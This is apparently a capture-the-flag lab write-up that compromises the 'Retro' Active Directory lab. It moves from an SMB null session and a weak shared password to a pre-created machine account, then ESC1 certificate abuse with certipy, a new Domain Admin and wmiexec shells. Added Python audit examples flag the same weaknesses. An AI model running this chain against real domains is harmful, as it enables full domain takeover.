VL-Retro

Nmap

PORT     STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-10 21:02:43Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-03-10T21:03:27+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-03-09T21:01:16
| Not valid after: 2025-09-08T21:01:16
| MD5: 57df:2f2a:42f8:12ba:1acb:785c:ad91:ac2b
| SHA-1: 6a2d:a6d3:9d5e:38a0:ebd7:8775:5f7f:1659:3733:78eb

Host script results:
|_clock-skew: mean: -2h00m00s, deviation: 0s, median: -2h00m00s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 48062/tcp): CLEAN (Timeout)
| Check 2 (port 9402/tcp): CLEAN (Timeout)
| Check 3 (port 6737/udp): CLEAN (Timeout)
| Check 4 (port 6198/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-03-10T21:03:28
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

SMB

Since little else is exposed on the machine, we first try an SMB null session:

smbclient -L //10.10.98.48 -N

[Screenshot: SMB null session share listing]
The null session works, and there is a Trainees share that looks interesting:

smbclient //10.10.98.48/Trainees -N

Inside the share there is an Important.txt file, which we download to our machine with the following command:

get Important.txt

Opening that file we see the following:

Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

Next we search for that shared account so we can try to brute-force its password. Because the null session works, impacket-lookupsid can enumerate valid usernames:

impacket-lookupsid guest@10.10.98.48 -no-pass

[Screenshot: lookupsid output]
The account the trainees share is called trainee (we could have guessed it, but fine).

After spraying a few common passwords, we tried the username as the password and it worked.
[Screenshot: trainee SMB access]
We also now have read access to the Notes share:

smbclient //10.10.98.48/Notes -U "trainee"

Then we download the file named ToDo.txt:

get ToDo.txt

Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

After reading ToDo.txt I started digging for information on old computer accounts and how they were created, and found the following in an article:

Note : In older Active Directories, it is possible to find accounts marked as “Assign this computer account as a pre-Windows 2000.” The password for these machine accounts is the lowercase name of the machine account itself. For example, the password for the machine account “XMCO$” would be “xmco”.

https://www.xmco.fr/en/active-directory-en/part-5-machine-accounts-in-the-active-directory/
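A defender-side check for the pre-Windows 2000 accounts the note describes, written as an added example (not from the article, the lab, or this writeup). Accounts created through that checkbox carry the PASSWD_NOTREQD bit in userAccountControl, so auditing computer objects for that bit, together with a machine password that has not rotated, finds candidates like the one mentioned in ToDo.txt. The records below are constructed sample data shaped like an LDAP computer search; only the two machine names come from the page, and pwdLastSet is assumed already converted from FILETIME to a date.

```python
from datetime import date

# userAccountControl bits from Microsoft's ADS_USER_FLAG_ENUM.
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000

# Constructed sample records (attribute values invented, not from the box).
# DC$ uses the usual domain controller flags (0x82000); BANKING$ uses 0x1020,
# i.e. WORKSTATION_TRUST_ACCOUNT + PASSWD_NOTREQD, the pre-created pattern.
COMPUTERS = [
    {"sAMAccountName": "DC$", "userAccountControl": 532480,
     "pwdLastSet": date(2025, 3, 9)},
    {"sAMAccountName": "BANKING$", "userAccountControl": 4128,
     "pwdLastSet": date(2019, 6, 1)},
]

# Scan date taken from the Nmap output above; used as the reference "today".
TODAY = date(2025, 3, 10)

def precreated_findings(records, today=TODAY, max_age_days=90):
    """Return {account: [reasons]} for workstation accounts that look
    pre-created and never joined: PASSWD_NOTREQD still set, or a machine
    password far older than the normal 30-day rotation window."""
    findings = {}
    for r in records:
        uac = int(r["userAccountControl"])
        if not uac & WORKSTATION_TRUST_ACCOUNT:
            continue                      # skip DCs / server trust accounts
        reasons = []
        if uac & PASSWD_NOTREQD:
            reasons.append("PASSWD_NOTREQD set")
        age = (today - r["pwdLastSet"]).days
        if age > max_age_days:
            reasons.append(f"machine password unchanged for {age} days")
        if reasons:
            findings[r["sAMAccountName"]] = reasons
    return findings

if __name__ == "__main__":
    for account, reasons in precreated_findings(COMPUTERS).items():
        print(account, "->", "; ".join(reasons))
```

Accounts flagged this way should have their password reset (or be removed if the machine no longer exists), which is exactly the cleanup James asks Thomas for in ToDo.txt.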

Bloodhound

I used bloodhound-python to get a better understanding of the domain:

bloodhound-python -u "trainee" -p "trainee" -d retro.vl -dc DC.retro.vl -ns 10.10.98.48 --zip

Using the query below we can see there are two machines:

MATCH (n:Computer) RETURN n

[Screenshot: machine accounts]
We will try the machine account Banking$ with the password banking:

netexec smb 10.10.98.48 -u 'Banking$' -p banking

The logon fails with STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, which can be fixed by changing the machine account's password:

impacket-changepasswd 'retro.vl/BANKING$':banking@10.10.98.48 -newpass StrongP@ss1234 -dc-ip 10.10.98.48 -p rpc-samr

AD CS

Running certipy to find any templates that may be vulnerable:

certipy find -u 'banking$'@retro.vl -p StrongP@ss1234 -dc-ip 10.10.98.48

Opening the text file it produces, we see that one template is vulnerable to ESC1:

Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
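A defender-side audit of the template output above, written as an added example (not certipy's own code and not part of the original writeup): it parses certipy's Key : Value text and flags the same combination of settings, so the two remediations (requiring manager approval, or turning off Enrollee Supplies Subject) can be checked against the sample. The RETRO_CLIENTS string is a trimmed copy of the output above; BROAD_PRINCIPALS is an assumed list of groups that give every domain member or machine enrollment rights.

```python
# Constructed sample: the RetroClients template as certipy printed it above,
# cut to the fields the check reads (added example, not certipy's own code).
RETRO_CLIENTS = """\
Template Name : RetroClients
Enabled : True
Client Authentication : True
Enrollee Supplies Subject : True
Requires Manager Approval : False
Authorized Signatures Required : 0
Enrollment Rights : RETRO.VL\\Domain Admins
RETRO.VL\\Domain Computers
RETRO.VL\\Enterprise Admins
Object Control Permissions
"""

# Groups that let any domain member or any domain-joined machine enroll.
BROAD_PRINCIPALS = {"Domain Computers", "Domain Users",
                    "Authenticated Users", "Everyone"}

def parse_template(text):
    """Map certipy's 'Key : Value' lines to a dict; 'Enrollment Rights'
    wraps extra DOMAIN\\Group principals onto their own lines."""
    fields, rights, in_rights = {}, [], False
    for line in text.splitlines():
        key, sep, val = (s.strip() for s in line.partition(":"))
        if sep:
            in_rights = key == "Enrollment Rights"
            if in_rights:
                rights.append(val)
            else:
                fields[key] = val
        elif in_rights and "\\" in key:
            rights.append(key)      # continuation line: DOMAIN\Group
        else:
            in_rights = False
    fields["Enrollment Rights"] = rights
    return fields

def broad_enrollers(tpl):
    """Low-privileged principals that hold enrollment rights."""
    names = {r.split("\\")[-1] for r in tpl["Enrollment Rights"]}
    return sorted(names & BROAD_PRINCIPALS)

def is_esc1(tpl):
    """ESC1: enabled, client-auth EKU, enrollee-supplied subject (so a UPN
    can be chosen), no approval or co-signature, and a broad enroller."""
    wanted = {"Enabled": "True", "Client Authentication": "True",
              "Enrollee Supplies Subject": "True",
              "Requires Manager Approval": "False",
              "Authorized Signatures Required": "0"}
    return all(tpl.get(k) == v for k, v in wanted.items()) and bool(broad_enrollers(tpl))
```

Flipping either "Requires Manager Approval" to True or "Enrollee Supplies Subject" to False in the sample makes is_esc1 return False, which is the fix a CA administrator would apply to this template.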

We can exploit ESC1 with the command below:

certipy req -u "banking$" -p "StrongP@ss1234" -target retro.vl -upn administrator@retro.vl -ca retro-DC-CA -template RetroClients

[Screenshot: certipy ESC1 request]
It fails with CERTSRV_E_KEY_LENGTH. Looking into it, we find this article: https://www.gradenegger.eu/en/the-request-for-certificates-via-the-network-device-registration-service-ndes-fails-with-the-error-message-the-public-key-does-not-meet-the-minimum-size-required-by-the-specified-cer/

It states:

This error occurs if the key length in the certificate request is less than configured in the certificate template configured for the NDES server. Thus, either the “Minimum Key Length” in the certificate template must be reduced, or a new certificate request with a sufficiently large key must be formed and sent to the NDES server.

Looking back at the certipy output, the template requires a minimum RSA key length of 4096 bits, so we repeat the request with a 4096-bit key:

certipy req -u 'BANKING$'@retro.vl -p "StrongP@ss1234" -dc-ip 10.10.98.48 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096

First way

Now that we have administrator.pfx, we spawn an LDAP shell, create a new user and add it to Domain Admins:

certipy auth -pfx administrator.pfx -dc-ip 192.168.0.100 -ldap-shell

add_user EvilAdmin
add_user_to_group EvilAdmin 'Domain Admins'

Second way

We get a valid TGT as administrator:

certipy auth -pfx administrator.pfx -dc-ip 10.10.98.48

Using the resulting credentials to get a shell:

KRB5CCNAME=administrator.ccache impacket-wmiexec -k -no-pass -dc-ip 10.10.98.48 retro.vl/administrator@DC.retro.vl

Alternatively, with the EvilAdmin account created in the first way, impacket-wmiexec gives us a shell and we grab the flags:

impacket-wmiexec EvilAdmin:'l0KHCK8F0Y?<&_T'@10.10.98.48

https://api.vulnlab.com/api/v1/share?id=ddf64ae9-fcad-498e-84ef-89aa99b6a242